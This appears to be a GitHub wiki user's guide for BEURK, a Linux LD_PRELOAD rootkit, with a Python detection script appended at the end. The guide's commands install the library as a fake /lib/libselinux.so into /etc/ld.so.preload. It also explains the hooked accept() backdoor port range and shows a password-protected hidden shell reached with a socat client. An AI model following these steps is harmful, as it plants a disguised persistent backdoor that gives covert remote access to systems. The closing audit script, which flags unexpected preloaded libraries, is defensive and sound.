User's Guide
chqrly edited this page May 18, 2015 · 5 revisions
This guide aims to provide you with a step-by-step set of instructions to use BEURK.
su -
git clone [email protected]:unix-thrust/beurk.git
cd beurk
./build beurk.conf
mv libselinux.so /lib
echo "/lib/libselinux.so" > /etc/ld.so.preload
Enjoy!!
The remote backdoor's gateway passes through a hooked accept(2) syscall.
So an infected process must be listening on a port (for example ssh, or a web server) in order to be able to connect to it.
The backdoor only opens if the bound port is within the LOW_BACKDOOR_PORT/HIGH_BACKDOOR_PORT range. Otherwise, it will ignore the connection request.
A small socat-based client is available at /utils/socat-client.sh to ease shell connection.
beurk@server:~/beurk$ LD_PRELOAD=./libselinux.so python -m SimpleHTTPServer 3005
Serving HTTP on 0.0.0.0 port 3005 ...
beurk@client:~/beurk$ ./utils/socat-client.sh 127.0.0.1:3005 64835
BEURK password:
Welcome to BEURK's hidden shell ...
beurk@server:~/beurk$ ls
CONTRIBUTING.md TODO.md includes src x.py
LICENSE beurk.conf installer.sh tests
README.md build libselinux.so utils
beurk@server:~/beurk$ exit
logout
beurk@client:~/beurk$
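Both load paths shown in this guide, the `/etc/ld.so.preload` entry from the install steps and the `LD_PRELOAD` variable from the session above, leave artifacts a defender can audit. The following is an added example, not part of the original guide or of the BEURK code base: it parses both sources and reports every preloaded library outside a baseline. The sample inputs, PIDs and the empty default baseline are assumptions constructed for illustration.

```python
import glob

# Constructed sample inputs mirroring the page's two load paths (not real host data).
SAMPLE_PRELOAD = "# constructed sample\n/lib/libselinux.so\n"
SAMPLE_ENVIRONS = {
    4242: b"HOME=/home/beurk\x00LD_PRELOAD=./libselinux.so\x00SHELL=/bin/bash\x00",
    4243: b"HOME=/root\x00SHELL=/bin/sh\x00",
}

def split_libs(value):
    """ld.so accepts library lists separated by whitespace or ':'."""
    return [p for p in value.replace(":", " ").split() if p]

def preload_file_entries(text):
    """Libraries named in an ld.so.preload body; '#' starts a comment."""
    libs = []
    for line in text.splitlines():
        libs.extend(split_libs(line.split("#", 1)[0]))
    return libs

def environ_preload(raw):
    """LD_PRELOAD libraries from a NUL-separated /proc/<pid>/environ blob."""
    for item in raw.split(b"\x00"):
        if item.startswith(b"LD_PRELOAD="):
            return split_libs(item[len(b"LD_PRELOAD="):].decode(errors="replace"))
    return []

def audit(preload_text, environs, allowed=frozenset()):
    """Return (source, library) findings for every preload not in the baseline."""
    findings = [("/etc/ld.so.preload", lib)
                for lib in preload_file_entries(preload_text) if lib not in allowed]
    for pid, raw in sorted(environs.items()):
        findings += [(f"pid {pid} LD_PRELOAD", lib)
                     for lib in environ_preload(raw) if lib not in allowed]
    return findings

def collect_live():
    """Read the same data from a running host; unreadable files are skipped."""
    def read(path, mode):
        try:
            with open(path, mode) as fh:
                return fh.read()
        except OSError:
            return "" if mode == "r" else b""
    environs = {int(p.split("/")[2]): read(p, "rb")
                for p in glob.glob("/proc/[0-9]*/environ")}
    return read("/etc/ld.so.preload", "r"), environs

if __name__ == "__main__":
    for source, lib in audit(SAMPLE_PRELOAD, SAMPLE_ENVIRONS):
        print(f"unexpected preload: {lib} ({source})")
```

A library listed in `/etc/ld.so.preload` is loaded into every dynamically linked process, including the interpreter running this check, so prefer passing `audit()` file contents read from an offline or forensic image over `collect_live()` on a host you do not trust.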